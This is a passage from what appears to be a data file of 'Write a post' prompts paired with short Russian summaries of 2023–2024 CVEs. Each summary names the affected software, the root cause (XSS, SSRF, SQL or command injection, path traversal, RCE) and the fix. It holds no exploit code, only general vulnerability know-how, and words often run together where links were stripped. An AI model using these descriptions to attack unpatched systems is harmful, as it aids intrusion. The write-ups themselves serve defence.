пользовательских данных без предварительной санитизации в html-код при рендере Markdown. Висправленииhtml-код после рендера Markdown пропускается через санитизирующую функциюnautobot_logging.clean_html(html), в которой используется функцияnh3.clean, реализующая санинизацию данных на основе “белых” списков тегов и атрибутов." Write a post on the following topic,Уязвимость SSRF в Whoogle Search до версии 0.8.3,"CVE-CVE-2024-22203 , найденная в поисковом движкеWhoogle Search до версии 0.8.3 (включительно), приводит кServer-Side Request Forgery (SSRF). В данном приложении существовала возможность попадания недоверенных пользовательских данных из состава параметров запроса (’url’, ‘type’) в состав URL формируемого GET-запроса. Дляисправленияразработчики реализовали проверку домена на его корректность (функцияvalidators.domain()) в составе URL перед формированием GET-запроса." Write a post on the following topic,Уязвимость CVE-2024-23648 в Pimcore's Admin Classic Bundle,"CVE-CVE-2024-23648 , обнаруженная вPimcore's Admin Classic Bundle до версии 1.2.3, приводит к инъекции адреса атакующего, по которому производится отправка токена при сбросе пароля. Проблема заключалась в том, что для формирования адреса использовались данные из заголовка ‘Host’. Висправлениив процессе формирования адреса исключили использование данных из заголовка ‘Host’ и реализовали использование домена из состава конфигурационных данных." Write a post on the following topic,Authentication Bypass в Fortra's GoAnywhere MFT до версии 7.4.1,"CVE-CVE-2024-0204 вFortra's GoAnywhere MFT до версии 7.4.1, упомянутая в наших еженедельных новостях, приводит кAuthentication Bypass. Проблема позволяла неавторизованному пользователю создать пользователя-администратора через административный портал. Описание бюллетеня безопасности можно найти вsecurity advisory. Детальный разбор уязвимости приведен в следующейстатье." Write a post on the following topic,Path Traversal уязвимость в web-фреймворке aiohttp,"CVE-CVE-2024-23334 , обнаруженнаяв web-фреймворке aiohttp от 1.0.5 до версии 3.9.2, приводит кPath Traversal. В фреймворке существует проблема перебора каталога при резолве пути к статическим ресурсам с использованием параметраfollow_symlinks=True- нет контроля пути относительно корневой директории. Висправлениипри установленном флагеfollow_symlinks=Trueперед резолвом пути выполняется его нормализация (функцияos.path.normpath()) и проверка пути относительно корневого каталога (функцияpathlib.PurePath.relative_to())." Write a post on the following topic,Command Injection уязвимость в Node.js,"CVE-CVE-2024-21488 , найденная впакете network для Node.js до версии 0.7.0, приводит кCommand Injection. Проблема обусловлена возможностью использования недоверенных данных от нарушителя в процессе формирования команды и ее выполнения с использованием функцииexec()пакетаchild_process. Дляисправленияразработчики добавили валидацию недоверенных входных данных с использованием функцииensure_valid_nic(), в которой реализовали проверку входных данных на “белый” список символов (a-zA-Z0-9_)." Write a post on the following topic,Уязвимость Server-Side Request Forgery в клиенте TrueLayerNET для TrueLayer до версии 1.6.0,"CVE-CVE-2024-23838 , выявленная в клиентеTrueLayerNET для TrueLayer до версии 1.6.0, приводит кServer-Side Request Forgery. В приложении был реализован механизм формирования запросов поURI, значения которого могли формироваться из недоверенных пользовательских данных. Дляисправленияуязвимости разработчики добавили перед формированием запроса механизм контроляURI(функцияHasValidBaseUri()), в которойURIпроверяется на допустимые значения из конфигурации приложения." Write a post on the following topic,Уязвимость XSS в клиенте apollo-client-nextjs для Next.js,"CVE-CVE-2024-23841 , найденная в клиентеapollo-client-nextjs для Next.js App Router до версии 0.7.0, приводит кCross-Site Scripting. Проблема заключается в функцииtransportDataToJS(), в которой производится преобразование входных данных из JSON-формата в строку. Возвращаемый результатtransportDataToJS()используется для формированияhtml-кода. Дляисключенияуязвимости разработчики добавили фильтрующую функциюhtmlEscapeJsonString(), в которой производится замена символов “&, <, >” на их Unicode ""\u0026, \u003e, \u003c""." Write a post on the following topic,Path Traversal уязвимость в сервере Crafatar для Minecraft,"CVE-CVE-2024-24756 , обнаруженная в сервере ресурсовCrafatar для Minecraft до версии 2.1.5, приводит кPath Traversal. При обработке запроса доступа к публичному ресурсу (каталогlib/public) значение пути из запроса записывается в полеreq.url.path_list, которое в дальнейшем используется для чтения файла в функцииasset_request(). При исправлении проблемы для формирования пути стали использовать функциюpath.resolve(), которая сформирует абсолютный путь без символов “../”, а также в функциюasset_request()добавили дополнительную проверку выхода за пределы каталогаlib/publicпри доступе к публичному ресурсу." Write a post on the following topic,"""Type Confusion in V8/Google Chrome""",CVE-CVE-2022-4262 (Type Confusion в V8/Google Chrome); Write a post on the following topic,"""неограниченная загрузка файлов в Avalanche""",CVE-CVE-2023-46263 (неограниченная загрузка файлов в Avalanche); Write a post on the following topic,"""RCE vulnerability in Shim loading mechanism""",CVE-CVE-2023-40547 (RCE в механизме загрузки Shim); Write a post on the following topic,"Уязвимости, связанные с повреждением памяти в HTTP серверах Lotos, Pico и Cherry","CVE-CVE-2024-22086 , CVE-2024-22087, и CVE-2024-22088(повреждения памяти в Lotos HTTP Server, Pico HTTP Server и Cherry HTTP Server);" Write a post on the following topic,Переполнение кучи в glibc,CVE-CVE-2023-6246 (переполнение кучи в glibc); Write a post on the following topic,"Уязвимости в Ofbiz: небезопасная десериализация, обход аутентификации и RCE","CVE-CVE-2023-49070 , CVE-2020-9496 и CVE-2023-51467(небезопасная десериализация, обход аутентификации и RCE в Ofbiz);" Write a post on the following topic,"""Code injection vulnerability in Zyxel NAS326 and NAS542""",CVE-CVE-2023-5372 (code injection в Zyxel’s NAS326 и NAS542). Write a post on the following topic,SQL Injection Vulnerability in SQLAlchemy Database Adapter,"CVE-CVE-2024-24811 , обнаруженная вадаптере базы данных SQLAlchemyDA до версии 2.2, приводит кSQL Injection. Проблема появилась из-за возможности использования методов формирования query-запросов без ограничений приватности. Висправлениибыли добавлены соответствующие настройки приватности для критичных методов с использованием методов (protected(), private()) из классаClassSecurityInfo." Write a post on the following topic,ReDoS уязвимость в FastAPI до версии 0.109.1 из-за модуля python-multipart.,"CVE-CVE-2024-24762 , выявленнаяв веб фреймворке FastAPI до версии 0.109.1, которая приводила кReDoS. Нарушитель мог скорректировать заголовокContent-Type, таким образом, что в процессе его контроля по регулярному выражению происходит повышенное потребление вычислительных ресурсов, что приводит к задержке обработки следующих запросов. Проблема была обусловлена использованием уязвимого модуляpython-multipart (ver. 0.0.5), висправлениибыла скорректирована версия на0.0.7." Write a post on the following topic,Cross-site Scripting vulnerability in phpMyFAQ before version 3.2.5,"CVE-CVE-2024-24574 , найденнаяв приложении phpMyFAQ до версии 3.2.5, приводит кCross-site Scripting. В приложении существует возможность загрузки файла, а потом использование данных файла (filename, record_lang, mime_type) для отображения на клиентской стороне. Дляисправленияуязвимости разработчики для полей:filename, record_lang, mime_typeпри их отображении добавили экранирующую функциюStrings::htmlentities()." Write a post on the following topic,SQL Injection в плагине Podlove Subscribe для WordPress,"CVE-CVE-2024-1118 , обнаруженнаяв плагине Podlove Subscribe для WordPress до версии 1.3.10, приводит кSQL Injection. Проблема заключалась в использовании недоверенных данных в формировании query-запроса к БД. Висправленииразработчики стали использовать функцию параметризации query-запросаprepare()классаwpdb." Write a post on the following topic,"Уязвимость в JetBrains TeamCity, приводящая к обходу аутентификации и возможному удаленному выполнению кода","CVE-CVE-2024-23917 , выявленная в JetBrains TeamCityдо версии 2023.11.3, приводит кBypass Authentication.Наиболее критичным последствием данной уязвимости может являтьсяRCE. О деталях уязвимости можно почитать на блоге поссылке." Write a post on the following topic,"""Уязвимость некорректной авторизации в Pixelfed до версии 0.11.11""","CVE-CVE-2024-25108 , обнаруженнаяв платформе Pixelfed до версии 0.11.11, приводит кIncorrect Authorization. Проблема появилась из-за возможности получения административного доступа. Висправленииввели дополнительные поля вpassport: admin:read, admin:write, которые стали контролироваться вAdminApiController. Также добавили проверку токена при обработке запроса$request->user()->token()." Write a post on the following topic,Уязвимость CVE-2024-24814 в mod_auth_openidc приводит к DoS.,"CVE-CVE-2024-24814 , найденнаяв модуле mod_auth_openidc для Apache до версии2.4.15.2, приводит кUncontrolled Resource Consumption (DoS). Нарушитель при установке достаточно большого значения (99999999)mod_auth_openidc_sessionвcookie, приводит к потреблению избыточных ресурсов сервера. Висправленииразработчики ввели ограничение на максимальное количествоchunkCount, не более 99." Write a post on the following topic,Cross-site scripting vulnerability in SidekiqUniqueJobs gem,"CVE-CVE-2024-25122 , обнаруженнаяв gem модуле SidekiqUniqueJobs до версии 7.1.33 и 8.0.7, приводит кCross-site Scripting. В модуле дляEndpoint""/changelogs, /locks, /expiring_locks"" недоверенные пользовательские данные участвуют в формировании html-страниц. Длякорректировкиразработчики значения параметров из запроса (filter, count, cursor, prev_cursor, digest) пропускают через экранирующую функциюh(), которая является псевдонимом функцииhtml_escape()." Write a post on the following topic,Path Traversal уязвимость в веб-приложении Mission Support System,"CVE-CVE-2024-25123 , выявленнаяв веб-приложении Mission Support System до версии 8.3.3, приводит кPath Traversal.В приложении внешние данные (переменнаяfilename) участвуют в формировании пути к статическому файлу с использованием функцииos.path.join(). Впатчезначение переменнойfilenameстали пропускать черезwerkzeug.security.safe_join()для исключения выхода за пределы базовой директории." Write a post on the following topic,Уязвимость Remote Code Execution в теме Bricks для WordPress,"CVE-CVE-2024-25600 , выявленная в темеBricks theme для WordPressдо версии 1.9.6 включительно, приводит кRemote Code Execution. Уязвимость обусловлена использованием функцииeval()при вызовеprepare_query_vars_from_settings(), которая может быть вызвана пользователем без аутентификации. Описание внесенных изменений можно найти поссылке. Детальный разбор уязвимости приведен встатьеи разборепатча." Write a post on the following topic,Kerberos relay and session hijacking in VMware Enhanced Authentication plugin.,"CVE-CVE-2024-22245 , CVE-2024-22250(Kerberos relay и похищении сессии в VMware Enhanced Authentication plugin);" Write a post on the following topic,"""Injection of code in Vanti EPM Cloud Services Appliance""",CVE-CVE-2021-44529 (инъекция кода в vanti EPM Cloud Services Appliance); Write a post on the following topic,"""RCE vulnerability in MyQ Print Server""",CVE-CVE-2024-22076 (RCE в MyQ Print Server); Write a post on the following topic,утечка содержимого памяти в Qualcomm Adreno GPU,CVE-CVE-2022-25664 (утечка содержимого памяти в Qualcomm Adreno GPU); Write a post on the following topic,"""Stored XSS vulnerability in Ghost CMS leading to CMS instance takeover""","CVE-CVE-2024-23724 (хранимая XSS в Ghost CMS, развиваемая в захват инстанса CMS)." Write a post on the following topic,Обнаружение Buffer Overflow в библиотеке CBOR,"CVE-CVE-2024-26134 , обнаруженнаяв библиотеке CBOR до версии 5.6.2, приводит кBuffer Overflow. Проблема заключалась в возможности выхода за пределы буфера в процессе чтении данных из потока. Висправлениипри чтении данных (функцииdecode_bytestring(),decode_string()) реализовано ограничение на максимальную длину (65536) порции данных." Write a post on the following topic,Cross-site scripting vulnerability in Decidim framework versions up to 0.27.5 and 0.28.0,"CVE-CVE-2023-51447 , найденнаяв фреймворке Decidim до версии 0.27.5 и 0.28.0, приводит кCross-site Scripting. В приложении при формированииhtml-страницыбыла возможность использовать данные (filename) загружаемого пользовательского файла. Дляисправленияразработчик стали использовать экранирующие функцииdecidim_html_escape(), escapeHtml(), escapeQuotes()." Write a post on the following topic,Уязвимость Cross-site Websocket Hijacking в MeshCentral,"CVE-CVE-2024-26135 , выявленнаяв сайте MeshCentralдо версии 1.1.21, приводит кСross-site Websocket Hijacking (CSWSH). Уязвимость обнаружена в административном компоненте и позволяла на клиентской стороне атакующему создать межсайтовое соединение черезwebsocketи читать конфигурационный файл сервера или генерировать токены доступа. Висправлениибыла введена проверка заголовкаOriginна ""белый"" список доменов (allowedorigin) с использованием функцииCheckWebServerOriginName()." Write a post on the following topic,Обнаружение уязвимости Cross-site Scripting в Querybook,"CVE-CVE-2024-26148 , обнаруженнаяв Querybook до версии 3.31.1, приводит кCross-site Scripting. Проблема заключалась в возможности внедрения инъекции (javascript:) черезURL. Висправлениибыла добавлена проверкаsanitizedUrl, которая протокол в составеURLна разрешенные значения(http, https)." Write a post on the following topic,"""Insecure CORS vulnerability in Fiber framework""","CVE-CVE-2024-25124 , найденнаяв web фреймворке Fiber до версии 2.52.1, приводит кInsecure CORS. Приложение допускает небезопасные конфигурации, которые потенциально могут подвергнуть приложение множеству уязвимостей, связанных сCORS. Дляисправленияразработчик добавили функциюvalidateDomain(), которая проверяетoriginна соответствие разрешенному домену." Write a post on the following topic,SQL Injection vulnerability in Parse Server versions up to 6.5.0,"CVE-CVE-2024-27298 , обнаруженнаяв Parse Server в версиях до 6.5.0, приводит кSQL Injection. Проблема заключалась в возможности обхода регулярного выражения (/([^'])'/), использующегося для фильтрации входных данных. Висправлениибыл скорректирован паттерн, который используется для фильтрации входных данных, путем добавления глобального модификатора -/([^'])'/g." Write a post on the following topic,XSS уязвимость в Pineterest Querybook,"CVE-CVE-2024-27103 , обнаруженнаяв Pineterest Querybook в версии до 3.31.1, приводит к возможности реализацииXSS. Проблема заключалась в использовании небезопасного поляdangerouslySetInnerHTML, в которое попадает пользовательский ввод. Висправлениибыла добавлена санитизация данных, которые вводит пользователь, с помощью функцииDOMPurify.sanitize." Write a post on the following topic,Уязвимость Prototype Pollution в JSONata до версии 1.8.7,"CVE-CVE-2024-27307 , выявленнаяв JSONata до версии 1.8.7, приводит кPrototype Pollution. Уязвимость обусловлена возможностью внедрения выражения с операторомtransformдля переопределения конструктора и прототипа объекта в приложения. Висправлениибыла добавлена проверка наличия в получаемой строке обращений к прототипу объекта или конструктору, при появлении которых возвращается ошибка." Write a post on the following topic,Уязвимость XSS в Ruby on Rails,"CVE-CVE-2024-26143 , выявленнаяв Ruby on Rails в версии до7.0.8.1, приводит к возможности реализацииXSS. Уязвимость обусловлена возможностью использования помощников перевода для обработки данных, содержащих полезную нагрузку XSS. Висправленнойверсии был добавлен фрагмент кода, который преобразует входные данные в массив и санитизирует каждый элемент массива с помощьюERB::Util.html_escape." Write a post on the following topic,Уязвимость обхода политики CORS в фреймворке go-zero,"CVE-CVE-2024-27302 , выявленнаяв фреймворке go-zero до версии 1.4.4, приводит к возможностиобхода политики CORS. Уязвимость обусловлена возможностью злоумышленника обходить политику CORS путем внедрения в заголовок http-запросаOriginзначения домена, содержащего в себе домен цели. Например для целиsafe.comможно внедрить доменnot-safe.comи обойти фильтр политики. Висправлениив функцииisOriginAllowed()была добавлена проверка значенияОriginна соответствие ""белому"" списку разрешенных доменов." Write a post on the following topic,"""Server Side Template Injection (SSTI) в peering-manager""","CVE-CVE-2024-28114 , обнаруженная в инструментеpeering-manager в версиях до версии 1.8.3, приводит кServer Side Template Injection (SSTI). Проблема заключалась в возможности внедрять вредоносный код в процессе рендераjinja-шаблона. Висправлениибыли внесены изменения в функциюrender_jinja2(), путем использования функцииSandboxedEnvironment()для создании ""песочницы"" при рендере шаблона." Write a post on the following topic,Уязвимость OS Command Injection в SOY CMS,"CVE-CVE-2024-28187 , выявленная вSOY CMS в версиях до 3.14.2, приводит кOS Command Injection. Уязвимость обусловлена возможностью выполнять произвольные команды ОС через специально созданные имена файлов при их загрузке. Висправлениибыла добавлена экранирующая функцияescapeshellarg()при обработке имени файла для функцииexecute()классаUploadFileAction." Write a post on the following topic,Уязвимость XSS в фреймворке Phlex,"CVE-CVE-2024-28199 , выявленнаяв фреймворке Phlex в версияхдо 1.9.1, приводит кXSS. Уязвимость обусловлена возможностью внедренияjavascript:в составе ссылки, предоставляемой пользователем (например, атрибутhrefтега). Висправлениив функции__build_attributes__был реализован фильтр, исключающий наличие в атрибутеhrefзначения ""javascript:""." Write a post on the following topic,Insecure deserialization in Symfony1 PHP web framework,"CVE-CVE-2024-28861 , обнаруженная вSymfony1 PHP web framework в версии до 1.5.18, приводит кInsecure deserialization. Проблема заключалась в возможности десериализации пользовательского кода в методе_unserialize()классовsfNamespacedParameterHolder, sfParameterHolder. Висправлениибыли внесены изменения в метод_unserialize()путем внедрения проверки типа (array) передаваемых данных и ограничения на максимальное количество элементов." Write a post on the following topic,Уязвимость в библиотеке follow-redirects приводит к утечке информации,"CVE-CVE-2024-28849 , найденная вбиблиотеке follow-redirects в версиях до 1.15.5, приводит кInformation Disclosure. Уязвимость обусловлена возможностью перехвата учетных данных при кросс-доменном перенаправлении через прокси. Дляисправлениябыла скорректирована функцияRedirectableRequest.prototype._processResponse()в части расширения регулярного выражения ""(?:proxy-)?"", используемого для удаления заголовкаProxy-Authorization." Write a post on the following topic,Vulnerability in PyAnsys Geometry leading to OS Command Injection.,"CVE-CVE-2024-29189 , обнаруженная вPyAnsys Geometry в версиях до 0.3.3, приводит кOS Command Injection. Проблема заключалась в потенциальной возможности прямого вызова метода_start_program()с установленным флагомshell=True. Висправленииизменили имя функции на приватное__start_program()и убрали механизм установки флагаshell=True." Write a post on the following topic,Уязвимость XSS в GeoNode до версии 4.2.3,"CVE-CVE-2024-27091 , выявленная вGeoNode до версии 4.2.3, приводит кCross-Site Scripting (XSS). Уязвимость обусловлена воpможностью внедрения в состав отображаемогоhtml-кодазначений из ранее полученных данных нарушителя. Впатчебыл добавлен методsanitize_html(), который экранирует опасныетеги htmlс помощью библиотекиnh3." Write a post on the following topic,CVE-2024-28233: CSRF в JupyterHub до версии 4.1.0,"CVE-CVE-2024-28233 , обнаруженная вJupyterHub до версии 4.1.0, приводит кCross-Site Request Forgery (CSRF). Проблема заключалась в возможности реализации атаки, заставив пользователя посетить вредоносный поддомен, и получить полный доступ кAPI JupyterHubи серверу пользователя. Висправлениибыла добавлены дополнительные настройки безопасности с использованием XSRF-токенов." Write a post on the following topic,XSS vulnerability in video server SRS versions up to 5.0.210,"CVE-CVE-2024-29882 , обнаруженнаяв video server SRS в версиях до 5.0.210, приводит кCross-Site Scripting (XSS). Проблема заключалась в возможности внедрения в эндпоинт/api/v1/vhosts/vid-?callback=вредоносных данныхjavascript. Дляисправлениябыла добавлена валидация и проверка получаемого значенияcallbackна отсутствие недопустимых символов." Write a post on the following topic,Уязвимость SQL-инъекции в PHPMyFAQ версии 3.2.5,"CVE-CVE-2024-27299 , выявленная вPHPMyFAQ в версии 3.2.5, приводит кSQL-injection. Уязвимость обусловлена возможностью внедрения вредоносного SQL кода в полеauthorEmailпри добавлении новости. Висправлениибыло добавлено экранирование поляauthorEmailс помощью функцииescape()." Write a post on the following topic,Безопасность веб-приложений: уязвимость CVE-2024-31218 в Webhood,"CVE-CVE-2024-31218 , обнаруженная вWebhood до версии 0.9.1, приводит кBroken Access Control. Проблема заключалась в возможности неавторизированному злоумышленнику отправитьHTTP-запроскAPIадминистраторабазы данных (Pocketbase) для создания учетной записи администратора . Висправлениибыла добавлена функция генерации случайной учетной записи администратора, если учетные записи администратора еще не были созданы." Write a post on the following topic,Уязвимость Local File Inclusion в Voila до версии 0.2.17,"CVE-CVE-2024-30265 , выявленная вvoila в версиях до 0.2.17, приводит кLocal File Inclusion. Уязвимость обусловлена возможностью доступа неавторизированных пользователей к локальным файлам хоста. Висправлениииз функции инициализации приложенияtornado.web.Application()был удален параметрstatic_path=""/"", указывающий на корневую директорию файловой системы, ." Write a post on the following topic,XSS уязвимость в Typebot версии 2.23.0,"CVE-CVE-2024-30264 , найденная вTypebot версии 2.23.0, приводит кXSS. Проблема обусловлена возможностью злоумышленника выполнить произвольный JavaScript путем отправки пользователю ссылки на страницу авторизации. Дляисправлениябыла добавлена санитизация параметраredirectPathс помощью функцииsanitizeUrl()из состава библиотеки@braintree/sanitize-url." Write a post on the following topic,Уязвимость SSRF в Mobile Security Framework до версии 3.9.7,"CVE-CVE-2024-31215 , выявленная вMobile Security Framework до версии 3.9.7, приводит кSSRF. Уязвимость обусловлена возможностью злоумышленника заставить сервер подключиться к внутренним службам в инфраструктуре организации. Висправлениив функцияхopen_firebase(), firebase_analysis()была добавлена проверка передаваемого адреса на содержание в нем подстрокиfirebaseio.com." Write a post on the following topic,Уязвимость Remote Code Execution в pgAdmin4,"CVE-CVE-2024-3116 , выявленная вpgAdmin4 до версии 8.5, приводит кRemote Code Execution (RCE). Уязвимость позволяет злоумышленникам выполнять произвольный код на сервереPGAdminчерез API валидации бинарного пути . Висправленииулучшена проверка отклонений бинарного пути. Детальный разбор уязвимости приведен встатье, а Proof-of-Concept поссылке." Write a post on the following topic,OS Command Injection в yt-dlp,"CVE-CVE-2024-22423 , обнаруженная вyt-dlp в версиях до 2024.04.09, приводит кOS Command Injection. Проблема заключалась в возможности удаленного выполнения кода через внедрение специальных символов. Висправлениибыла добавлена функцияshell_quote(), с помощью которой происходит экранирование внедряемых специальных символов." Write a post on the following topic,"Уязвимость в Rust, приводящая к удалённому выполнению кода (Remote Code Execution)","CVE-CVE-2024-24576 , выявленная вRust в версиях до 1.77.2, приводит кRemote Code Execution. Уязвимость обусловлена возможностью злоумышленника выполнять произвольные команды оболочки в ОС Window используяAPI Command, минуя экранирование аргументов, передаваемых в порожденный процесс. Висправлениибыла добавлена функцияappend_bat_arg()для обработки и экранирования получаемых аргументов." Write a post on the following topic,Server-side Request Forgery в Plane до v0.17-dev,"CVE-CVE-2024-31461 , обнаруженная вPlaneв версиях до v0.17-dev, приводит кServer-side Request Forgery. Проблема заключалась в возможности злоумышленника отправлять произвольные запросы с сервера, на котором размещено приложение, что потенциально может привести к несанкционированному доступу к внутренним системам. Висправлениибыла добавлена функцияis_allowed_hostnameдля проверки получаемого доменного имени с ""белым"" списком разрешенных значений." Write a post on the following topic,Уязвимость в llama-index приводит к удаленному выполнению кода,"CVE-CVE-2024-3098 , выявленная вllama-index в версиях до 0.10.24, приводит кRemote Code Execution. Уязвимость обусловлена возможностью злоумышленника добиться удаленного выполнения кода посредством манипуляций с подклассомstr. Висправлениибыл изменен списокALLOWED_BUILTINS, который содержит в себе разрешенные встроенные объекты, а также добавлен контроль обращения к объектам, которые не входят в него." Write a post on the following topic,OS Command Injection в файрволлах Palo Alto,"CVE-CVE-2024-3400 , обнаруженная в файрволлахPalo Alto в версиях PAN-OS 10.2, 11.0 и 11.1, приводит кOS Command Injection. Проблема заключалась в возможности злоумышленника, не прошедшему аутентификацию, выполнить произвольный код с привилегиями root на брандмауэре. Описание проблемы приведено в официальномsecurity advisory. Встатьеот специалистовUnit42содержится информация об уязвимостиCVE-2024-3400и данные об успешных атаках." Write a post on the following topic,Обнаружение уязвимости Local File Inclusion в langchain (CVE-2024-3571),"CVE-CVE-2024-3571 , обнаруженная вlangchain в версиях до 0.0.353, приводит кLocal File Inclusion (LFI). Проблема заключается в возможности злоумышленника обращаться к файлам ОС напрямую с правами чтения и записи. Висправлениибыл изменен метод_get_full_path()путем добавления проверки получаемого значения пути со значением корневого каталога (self.root_path)." Write a post on the following topic,CVE-2024-27306: XSS vulnerability in aiohttp due to improper file name handling,"CVE-CVE-2024-27306 , обнаруженная вaiohttp в версиях до 3.9.4, приводит кCross-SiteScripting (XSS). Проблема заключалась в возможности злоумышленника загружать файлы с произвольными именами в статический каталог. Далее имена файлов использовались при генерации html-кода index страницы. Висправлениибыла скорректирована функция_directory_as_html()путем экранирования специальных символов в именах файлов с помощью методовhtml_escapeи_quote_path." Write a post on the following topic,Insecure Deserialization in BentoML,"CVE-CVE-2024-2912 , обнаруженная вBentoML в версиях до 1.2.5, приводит кInsecure Deserialization. Проблема заключается в возможности удаленного выполнения кода с помощью специально сформированного POST-запроса cо значением""Content-Type"": ""application/vnd.bentoml+pickle""на любую допустимую конечную точку. Висправлениибыла добавлена проверка на тип""application/vnd.bentoml+pickle""и формирование исключения при положительном результате." Write a post on the following topic,CVE-CVE-2024-32472 в excalidraw приводит к Cross-Site Scripting (XSS),"CVE-CVE-2024-32472 , обнаруженная вexcalidraw в версиях до 0.17.6, приводит кCross-Site Scripting (XSS). Проблема заключалась в возможности злоумышленника запускать произвольныйJavaScriptв контексте домена, на котором размещен редактор. Одной из причин проблемы является рендер недоверенных данных для фреймаsrcdoc. Висправлениибыла добавлена функция экранированияsanitizeHTMLAttribute(), которая используется при формировании ссылки для фреймаsrcdoc- функцияcreateSrcDoc()." Write a post on the following topic,CVE-2024-20356: Command Injection Vulnerability in Cisco Integrated Management Controller,"CVE-CVE-2024-20356 , обнаруженная вCisco Integrated Management Controller, приводит кCommand Injection.Проблема заключалась в возможности злоумышленника, прошедшего проверку подлинности, с привилегиями уровня администратора выполнить атаки путем внедрения команд в уязвимую систему и повысить свои привилегии до уровня root. Описание проблемы приведено в официальномsecurity advisory. Встатьеот специалистовNettitudeсодержится информация об уязвимостиCVE-2024-20356и данные об успешных атаках." Write a post on the following topic,Deserialization of Untrusted Data in NewPipe Android App,"CVE-CVE-2024-32876 , обнаруженная в Android приложенииNewPipe в версиях до 0.27.0, приводит кDeserialization of Untrusted Data. Проблема заключалась в возможности удаленного выполнения кода на устройствах с помощью резервной копии, содержащейpayload. Висправлениибыло добавлено ограничение классов, которые могут быть десериализованы при обработке потоковых объектовJava, добавив ""белый"" список с классами (CLASS_WHITELIST), которые не могут привести к выполнению произвольного кода." Write a post on the following topic,Уязвимость Prototype Pollution в пакете@conform-to,"CVE-CVE-2024-32866 , выявленная в пакете@conform-to/... в версиях до 1.1.1, приводит кPrototype Pollution. Уязвимость обусловлена возможностью злоумышленника инициировать ""загрязнения"" прототипа, передав ""загрязненные"" данные в функцииparseWith...(). Висправлениибыла добавлена проверка наличия поля у объекта (черезObject.hasOwn()) в функцияхsetValue()иgetValue()." Write a post on the following topic,SQL Injection в LibreNMS,"CVE-CVE-2024-32461 , обнаруженная в системе мониторингаLibreNMS в версии 24.3.0, приводит кSQL Injection. Проблема заключалась в возможности пользователя с глобальными привилегиями выполнить SQL-запрос черезpackageпараметр. Висправлениибыло скорректировано формирований SQL-запроса с использованием параметризации." Write a post on the following topic,Уязвимость SSTI в сервисе changedetection,"CVE-CVE-2024-32651 ,обнаруженная в сервисеchangedetection версии до 0.45.21, приводит кServer-Side Template Injection (SSTI). Причиной уязвимости является возможность влияния нарушителя на шаблон перед его рендером, что позволяет выполнять навязанный нарушителем код. Висправлениистали выполнять рендер шаблона в ""песочнице"" через использование классаjinja2.sandbox.ImmutableSandboxedEnvironment. вместо небезопасного классаjinja2.Environment." Write a post on the following topic,"Уязвимость CVE-2024-4040 в CrushFTP, приводящая к удалённому выполнению кода.","CVE-CVE-2024-4040 , обнаруженная вCrushFTP в версиях до 10.7.1 и 11.1.0, приводит кRemote Code Execution (RCE). Проблема заключалась в возможности неаутентифицированным удаленным злоумышленникам читать файлы из файловой системы за пределами песочницы VFS, обходить аутентификацию для получения административного доступа и выполнять удаленное выполнение кода на сервере. Описание проблемы, а также рекомендации по обновлению в официальномsecurity advisory. Встатьеот специалистовRapid7содержится информация об уязвимостиCVE-2024-4040и данные об успешных атаках." Write a post on the following topic,Vulnerability in xml-crypto leading to improper verification of cryptographic signature.,"CVE-CVE-2024-32962 , обнаруженная вxml-crypto в версиях с 4.0.0 до 6.0.0, приводит кImproper Verification of Cryptographic Signature. Проблема заключалась в отсутствии проверок для сертификата, которым подписанXML-документ, и использовании по умолчанию сертификата из элемента. Злоумышленник может подписатьXML-документподписью, созданной с использованием своего закрытого ключа и прикрепить сертификат к элементу, что позволит ему успешно пройти проверку подлинности. Висправлениибыло отключено использование по умолчанию функцииgetCertFromKeyInfo(), которая извлекает сертификат из элемента." Write a post on the following topic,Vulnerability in aiohttp leading to Denial of Service (CVE-CVE-2024-30251).,"CVE-CVE-2024-30251 , выявленная в фреймворкеaiohttp в версиях до 3.9.4, приводит кDenial of Service (DoS). Уязвимость обусловлена возможностью атакующего отправить специально созданный запросPOST(multipart/form-data) и когда серверaiohttpобработает его, сервер войдет в бесконечный цикл и не сможет обрабатывать дальнейшие запросы. Висправлениибыла добавлена проверка достижения конца данных (функцияat_eof()) и формирование признака завершения обработки данныхself._at_eof = True." Write a post on the following topic,OS Command Injection in sagemaker-python-sdk,"CVE-CVE-2024-34073 , обнаруженная вsagemaker-python-sdk в версиях до 2.214.3, приводит кOS Command injection. Проблема заключалась в возможности удаленного выполнение кода путем его внедрения в параметрrequirements_path. Висправлениибыла изменена функцияcapture_dependencies(),в которой команда стала формироваться с использованием списка, а для ее исполнения стали использовать командуsubprocess.run()с флагамиcheck=Trueиcapture_output=True." Write a post on the following topic,Cross-Site Scripting (XSS) vulnerability in speedtest versions 5.2.5 to 5.3.0,"CVE-CVE-2024-32890 , выявленная вspeedtest в версиях с 5.2.5 до 5.3.0, приводит кCross-Site Scripting (XSS). Уязвимость обусловлена возможностью внедренияjavascriptкода при взаимодействии с JSON API. Висправлениибыло исправлена функция возврата результатов путем добавления заголовкаContent-Typeсо значением""application/json; charset=utf-8""" Write a post on the following topic,SQL-инъекция в плагине WP-Automatic для WordPress,"CVE-CVE-2024-27956 , обнаруженная вплагине WP‑Automatic для WordPress в версиях до 3.9.2, приводит кSQL-injection. Проблема заключалась в возможности любого пользователя корректировать SQL-запрос. Описание проблемы, руководство по обновлению, признаки компрометаций и рекомендации смягчающих действий отражены вблокеWPScan. Встатьеот специалистовPatchStackсодержится информация об уязвимостиCVE-2024-27956и данные об успешных атаках." Write a post on the following topic,Path Traversal уязвимость в фреймворке litestar,"CVE-CVE-2024-32982 , обнаруженная вфреймворке litestar в версиях от 2.0.0 до 2.8.3, приводит кPath Traversal. Проблема заключалась в возможности злоумышленника использовать недостатки обхода пути, обеспечивая несанкционированный доступ к конфиденциальным файлам за пределами назначенных каталогов. Висправлениибыла добавлена нормализация получаемых путей с помощьюos.path.normpath()и последующая проверка с установленным статическим значением директории." Write a post on the following topic,Command Injection в Hoppscotch,"CVE-CVE-2024-34347 , выявленная вhoppscotch в версиях от 0.5.0 до 0.8.0, приводит кCommand Injection. Уязвимость обусловлена возможностью злоумышленника использовать открытые ссылки на объект, чтобы выйти из песочницы и выполнить произвольные системные команды. Висправлениибыла добавлена поддержка библиотекиisolated-vm, которая позволяет создавать более защищенные изолированные среды для выполнения скриптов." Write a post on the following topic,CVE-CVE-2024-32980: уязвимость в формировании URL из заголовка Host в Spin до версии 2.4.3.,"CVE-CVE-2024-32980 , обнаруженная вSpin в версиях до 2.4.3, приводит кExternally Controlled Reference to a Resource in Another Sphere. Проблема заключалась в возможности злоумышленника влиять на формирование URL-адреса запроса через заголовокHostвходящегоhttp-запроса. Висправлениибыло добавлена скорректирована 